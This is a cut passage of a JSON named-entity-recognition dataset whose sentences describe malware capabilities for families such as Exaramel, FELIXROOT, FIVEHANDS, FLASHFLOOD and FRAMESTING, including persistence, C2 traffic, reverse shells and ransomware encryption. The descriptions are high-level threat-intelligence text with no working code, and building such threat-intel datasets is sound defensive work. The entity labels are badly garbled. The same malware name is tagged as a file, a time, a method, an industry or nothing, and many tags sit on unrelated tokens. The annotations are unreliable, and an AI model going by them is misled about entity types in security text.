"O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "EvilGrab", - "has", - "the", - "capability", - "to", - "capture", - "video", - "from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "has", - "a", - "hardcoded", - "location", - "that", - "it", - "uses", - "to", - "achieve", - "persistence", - "if", - "the", - "startup", - "system", - "is", - "Upstart", - "or", - "System", - "V", - "and", - "it", - "is", - "running", - "as", - "root." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "uses", - "crontab", - "for", - "persistence", - "if", - "it", - "does", - "not", - "have", - "root", - "privileges." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "can", - "decrypt", - "its", - "configuration", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "uses", - "RC4", - "for", - "encrypting", - "the", - "configuration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "can", - "attempt", - "to", - "find", - "a", - "new", - "C2", - "server", - "if", - "it", - "receives", - "an", - "error." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "can", - "uninstall", - "its", - "persistence", - "mechanism", - "and", - "delete", - "its", - "configuration", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "has", - "a", - "command", - "to", - "download", - "a", - "file", - "from", - "and", - "to", - "a", - "remote", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "can", - "execute", - "commands", - "with", - "high", - "privileges", - "via", - "a", - "specific", - "binary", - "with", - "setuid", - "functionality." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "can", - "run", - "<code>whoami</code>", - "to", - "identify", - "the", - "system", - "owner." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "has", - "a", - "hardcoded", - "location", - "under", - "systemd", - "that", - "it", - "uses", - "to", - "achieve", - "persistence", - "if", - "it", - "is", - "running", - "as", - "root." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "has", - "a", - "command", - "to", - "execute", - "a", - "shell", - "command", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Linux", - "uses", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Windows", - "automatically", - "encrypts", - "files", - "before", - "sending", - "them", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Windows", - "stores", - "the", - "backdoor's", - "configuration", - "in", - "the", - "Registry", - "in", - "XML", - "format." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Windows", - "specifies", - "a", - "path", - "to", - "store", - "files", - "scheduled", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Exaramel", - "for", - "Windows", - "dropper", - "creates", - "and", - "starts", - "a", - "Windows", - "service", - "named", - "wsmprovav", - "with", - "the", - "description", - "“Windows", - "Check", - "AV”", - "in", - "an", - "apparent", - "attempt", - "to", - "masquerade", - "as", - "a", - "legitimate", - "service." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Windows", - "adds", - "the", - "configuration", - "to", - "the", - "Registry", - "in", - "XML", - "format." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Windows", - "has", - "a", - "command", - "to", - "execute", - "VBS", - "scripts", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exaramel", - "for", - "Windows", - "has", - "a", - "command", - "to", - "launch", - "a", - "remote", - "shell", - "and", - "executes", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Exaramel", - "for", - "Windows", - "dropper", - "creates", - "and", - "starts", - "a", - "Windows", - "service", - "named", - "wsmprovav", - "with", - "the", - "description", - "“Windows", - "Check", - "AV.”" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "I-SamFile", - "B-SecTeam", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Expand", - "can", - "be", - "used", - "to", - "decompress", - "a", - "local", - "or", - "remote", - "CAB", - "file", - "into", - "an", - "executable." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Expand", - "can", - "be", - "used", - "to", - "download", - "or", - "upload", - "a", - "file", - "over", - "a", - "network", - "share." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Expand", - "can", - "be", - "used", - "to", - "download", - "or", - "copy", - "a", - "file", - "into", - "an", - "alternate", - "data", - "stream." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "a", - "function", - "to", - "use", - "the", - "OpenClipboard", - "wrapper." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Explosive", - "can", - "scan", - "all", - ".exe", - "files", - "located", - "in", - "the", - "USB", - "drive." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "commonly", - "set", - "file", - "and", - "path", - "attributes", - "to", - "hidden." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "a", - "function", - "to", - "download", - "a", - "file", - "to", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "leveraged", - "its", - "keylogging", - "capabilities", - "to", - "gain", - "access", - "to", - "administrator", - "accounts", - "on", - "target", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "a", - "function", - "to", - "write", - "itself", - "to", - "Registry", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "a", - "function", - "to", - "call", - "the", - "OpenClipboard", - "wrapper." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "encrypted", - "communications", - "with", - "the", - "RC4", - "method." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "collected", - "the", - "computer", - "name", - "from", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "collected", - "the", - "MAC", - "address", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "collected", - "the", - "username", - "from", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explosive", - "has", - "used", - "HTTP", - "for", - "communication." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "FALLCHILL", - "can", - "delete", - "malware", - "and", - "associated", - "artifacts", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FALLCHILL", - "can", - "search", - "files", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FALLCHILL", - "uses", - "fake", - "Transport", - "Layer", - "Security", - "(TLS)", - "to", - "communicate", - "with", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FALLCHILL", - "encrypts", - "C2", - "data", - "with", - "RC4", - "encryption." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "B-Features", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FALLCHILL", - "can", - "collect", - "operating", - "system", - "(OS)", - "version", - "information,", - "processor", - "information,", - "system", - "name,", - "and", - "information", - "about", - "installed", - "disks", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FALLCHILL", - "collects", - "MAC", - "address", - "and", - "local", - "IP", - "address", - "information", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FALLCHILL", - "can", - "modify", - "file", - "or", - "directory", - "timestamps." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FALLCHILL", - "has", - "been", - "installed", - "as", - "a", - "Windows", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "encrypts", - "collected", - "data", - "with", - "AES", - "and", - "Base64", - "and", - "then", - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "encrypts", - "strings", - "in", - "the", - "backdoor", - "using", - "a", - "custom", - "XOR", - "algorithm." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "deletes", - "the", - ".LNK", - "file", - "from", - "the", - "startup", - "directory", - "as", - "well", - "as", - "the", - "dropper", - "components." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "downloads", - "and", - "uploads", - "files", - "to", - "and", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "deletes", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open</code>." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FELIXROOT", - "collects", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "queries", - "the", - "Registry", - "for", - "specific", - "keys", - "for", - "potential", - "privilege", - "escalation", - "and", - "proxy", - "information.", - "FELIXROOT", - "has", - "also", - "used", - "WMI", - "to", - "query", - "the", - "Windows", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "adds", - "a", - "shortcut", - "file", - "to", - "the", - "startup", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "uses", - "Rundll32", - "for", - "executing", - "the", - "dropper", - "program." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "checks", - "for", - "installed", - "security", - "software", - "like", - "antivirus", - "and", - "firewall." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FELIXROOT", - "creates", - "a", - ".LNK", - "file", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "collects", - "the", - "victim’s", - "computer", - "name,", - "processor", - "architecture,", - "OS", - "version,", - "volume", - "serial", - "number,", - "and", - "system", - "type." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "collects", - "information", - "about", - "the", - "network", - "including", - "the", - "IP", - "address", - "and", - "DHCP", - "server." - ], - "ner_tags": [ - "B-Idus", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "collects", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "gathers", - "the", - "time", - "zone", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "uses", - "HTTP", - "and", - "HTTPS", - "to", - "communicate", - "with", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "executes", - "batch", - "scripts", - "on", - "the", - "victim’s", - "machine,", - "and", - "can", - "launch", - "a", - "reverse", - "shell", - "for", - "command", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FELIXROOT", - "uses", - "WMI", - "to", - "query", - "the", - "Windows", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIVEHANDS", - "can", - "receive", - "a", - "command", - "line", - "argument", - "to", - "limit", - "file", - "encryption", - "to", - "specified", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIVEHANDS", - "can", - "use", - "an", - "embedded", - "NTRU", - "public", - "key", - "to", - "encrypt", - "data", - "for", - "ransom." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIVEHANDS", - "has", - "the", - "ability", - "to", - "decrypt", - "its", - "payload", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "FIVEHANDS", - "payload", - "is", - "encrypted", - "with", - "AES-128." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FIVEHANDS", - "has", - "the", - "ability", - "to", - "enumerate", - "files", - "on", - "a", - "compromised", - "host", - "in", - "order", - "to", - "encrypt", - "files", - "with", - "specific", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIVEHANDS", - "has", - "the", - "ability", - "to", - "delete", - "volume", - "shadow", - "copies", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIVEHANDS", - "can", - "enumerate", - "network", - "shares", - "and", - "mounted", - "drives", - "on", - "a", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIVEHANDS", - "can", - "use", - "WMI", - "to", - "delete", - "files", - "on", - "a", - "target", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FLASHFLOOD", - "employs", - "the", - "same", - "encoding", - "scheme", - "as", - "SPACESHIP", - "for", - "data", - "it", - "stages.", - "Data", - "is", - "compressed", - "with", - "zlib,", - "and", - "bytes", - "are", - "rotated", - "four", - "times", - "before", - "being", - "XOR'ed", - "with", - "0x23." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FLASHFLOOD", - "searches", - "for", - "interesting", - "files", - "(either", - "a", - "default", - "or", - "customized", - "set", - "of", - "file", - "extensions)", - "on", - "the", - "local", - "system.", - "FLASHFLOOD", - "will", - "scan", - "the", - "My", - "Recent", - "Documents,", - "Desktop,", - "Temporary", - "Internet", - "Files,", - "and", - "TEMP", - "directories.", - "FLASHFLOOD", - "also", - "collects", - "information", - "stored", - "in", - "the", - "Windows", - "Address", - "Book." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FLASHFLOOD", - "searches", - "for", - "interesting", - "files", - "(either", - "a", - "default", - "or", - "customized", - "set", - "of", - "file", - "extensions)", - "on", - "removable", - "media", - "and", - "copies", - "them", - "to", - "a", - "staging", - "area.", - "The", - "default", - "file", - "types", - "copied", - "would", - "include", - "data", - "copied", - "to", - "the", - "drive", - "by", - "SPACESHIP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FLASHFLOOD", - "searches", - "for", - "interesting", - "files", - "(either", - "a", - "default", - "or", - "customized", - "set", - "of", - "file", - "extensions)", - "on", - "the", - "local", - "system", - "and", - "removable", - "media." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FLASHFLOOD", - "stages", - "data", - "it", - "copies", - "from", - "the", - "local", - "system", - "or", - "removable", - "drives", - "in", - "the", - "\"%WINDIR%\\$NtUninstallKB885884$\\\"", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FLASHFLOOD", - "achieves", - "persistence", - "by", - "making", - "an", - "entry", - "in", - "the", - "Registry's", - "Run", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FLIPSIDE", - "uses", - "RDP", - "to", - "tunnel", - "traffic", - "from", - "a", - "victim", - "environment." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FRAMESTING", - "can", - "embed", - "itself", - "in", - "the", - "CAV", - "Python", - "package", - "of", - "an", - "Ivanti", - "Connect", - "Secure", - "VPN", - "located", - "in", - "`/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py.`" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FRAMESTING", - "can", - "send", - "and", - "receive", - "zlib", - "compressed", - "data", - "within", - "`POST`", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FRAMESTING", - "can", - "decompress", - "data", - "received", - "within", - "`POST`", - "requests." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FRAMESTING", - "uses", - "a", - "cookie", - "named", - "`DSID`", - "to", - "mimic", - "the", - "name", - "of", - "a", - "cookie", - "used", - "by", - "Ivanti", - "Connect", - "Secure", - "appliances", - "for", - "maintaining", - "VPN", - "sessions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "I-SecTeam", - "I-SecTeam", - "I-SecTeam", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "FRAMESTING", - "is", - "a", - "Python", - "web", - "shell", - "that", - "can", - "embed", - "in", - "the", - "Ivanti", - "Connect", - "Secure", - "CAV", - "Python", - "package." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FRAMESTING", - "can", - "retrieve", - "C2", - "commands", - "from", - "values", - "stored", - "in", - "the", - "`DSID`", - "cookie", - "from", - "the", - "current", - "HTTP", - "request", - "or", - "from", - "decompressed", - "zlib", - "data", - "within", - "the", - "request's", - "`POST`", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FRAMESTING", - "is", - "a", - "web", - "shell", - "capable", - "of", - "enabling", - "arbitrary", - "command", - "execution", - "on", - "compromised", - "Ivanti", - "Connect", - "Secure", - "VPNs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FYAnti", - "has", - "the", - "ability", - "to", - "decrypt", - "an", - "embedded", - ".NET", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FYAnti", - "can", - "search", - "the", - "<code>C:\\Windows\\Microsoft.NET\\</code>", - "directory", - "for", - "files", - "of", - "a", - "specified", - "size." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FYAnti", - "can", - "download", - "additional", - "payloads", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FYAnti", - "has", - "used", - "ConfuserEx", - "to", - "pack", - "its", - ".NET", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-SamFile" - ] - }, - { - "tokens": [ - "FakeM", - "contains", - "a", - "keylogger", - "module." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Some", - "variants", - "of", - "FakeM", - "use", - "SSL", - "to", - "communicate", - "with", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FakeM", - "C2", - "traffic", - "attempts", - "to", - "evade", - "detection", - "by", - "resembling", - "data", - "generated", - "by", - "legitimate", - "messenger", - "applications,", - "such", - "as", - "MSN", - "and", - "Yahoo!", - "messengers.", - "Additionally,", - "some", - "variants", - "of", - "FakeM", - "use", - "modified", - "SSL", - "code", - "for", - "communications", - "back", - "to", - "C2", - "servers,", - "making", - "SSL", - "decryption", - "ineffective." - ], - "ner_tags": [ - "B-Way", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - 